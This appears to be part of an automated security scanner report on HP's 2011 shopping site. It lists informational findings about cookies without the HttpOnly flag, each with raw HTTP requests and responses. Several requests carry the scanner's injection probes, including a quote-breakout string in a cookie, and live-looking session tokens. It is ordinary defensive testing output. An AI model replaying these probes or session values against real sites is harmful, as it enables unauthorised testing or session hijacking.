User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlkjit%2BQ3Ql7NSzqs1TccwGd0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apopup%3Afree%20shipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; EMID=; s_depth=17; s_cc=true; HP_EBUS_HP_CLICKS=4x15x6213; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asdp%25253Adesktops%25253Aeveryday%252520computing%25253Ap7xt_series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BstoConfig.submit()%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:07:54 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqjt2W2A5xOi3rslfedwOX0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:07:55 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:07:55 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224469

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...

4.67. http://www.shopping.hp.com/supplies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /supplies

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /supplies;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_supplies_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkiit2e2AN7NS3rulTfcQyX0ic%3D; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=3x3x19

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkij96W2w9%2FOi%2Frv1TZdg3Tng%3D%3D; expires=Friday, 20-Jan-2012 00:54:56 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 201400

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...

4.68. http://www.shopping.hp.com/webapp/shopping/add_to_cart.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/add_to_cart.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /webapp/shopping/add_to_cart.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 75
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; hpcompc_usen=cartExists=true; HP_EBUS_HP_CLICKS=4x16x6476; EMID=; s_depth=19; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=%5B%5BB%5D%5D

add_prod_id=TD367AA%2523ABA&ADD=ADD&page=CWBAB-pdp&qty=1&nextPage=cart_ajax

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:46 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=Bj3CT6LW2h81vmYs4rKFwGvrvRv3Kq3sJ7yDyjLqDQQYnvZbs21L!-1039217636; expires=Friday, 23-Sep-2011 01:10:46 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7778


<form name="revisePCPC" method="post" action="http://www.shopping.hp.com/webapp/shopping/cto.do">
<input type="hidden" name="conversationId" value="">
<input type="hidden" name="c
...[SNIP]...

4.69. http://www.shopping.hp.com/webapp/shopping/can.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/can.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/can.do?landing=esp&category=Notebook&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/psg_ipg/esp/Laptops_and_mini_PCs HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; hpcompc_usen=cartExists=true; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11101; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Aservices%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fcan.do_landing%25253Desp%252526category%25253DNotebook%252526catLevel%25253D1%252526storeName%25253Dstorefronts%252526jumpid%25253Din__1%2526oidt%253D1%2526ot%253DIMG%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:34 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:35 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 402159


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

4.70. http://www.shopping.hp.com/webapp/shopping/home.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/home.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/home.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hp.com/country/us/en/cs/media/swf/homepage_carousel.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; EMID=; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; s_depth=1; lang=en-us; cc=us; s_cc=true; s_sq=%5B%5BB%5D%5D; h_cm2=cs%3Aus_en_home_message_l1_hho_fixed_shopnow_flashlink

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:29 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrit2T3wh5OijqulLZdgKXmiaumQ%3D%3D; expires=Friday, 20-Jan-2012 00:54:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 148762

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_head
...[SNIP]...

4.71. http://www.shopping.hp.com/webapp/shopping/mpss_portal.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/mpss_portal.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/mpss_portal.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; hpcompc_usen=cartExists=true; EMID=; s_depth=19; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS_HP_CLICKS=4x17x11042; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Ahome%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fmpss_portal.do_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CArticle%25257CHP%252520CoolSense%252520Technology%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fcache%25252F596786-0-0-225-121.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:26 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:27 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 140544

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<style type="text/css">
.NewMpss{float
...[SNIP]...

4.72. http://www.shopping.hp.com/webapp/shopping/product_advisor.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_advisor.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/product_advisor.do?landing=desktops&storeName=computer_store HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One+PCs&jumpid=in_R329_prodexp/hhoslp/psg/desktops/All-in-One_PCs
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=24; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11190; 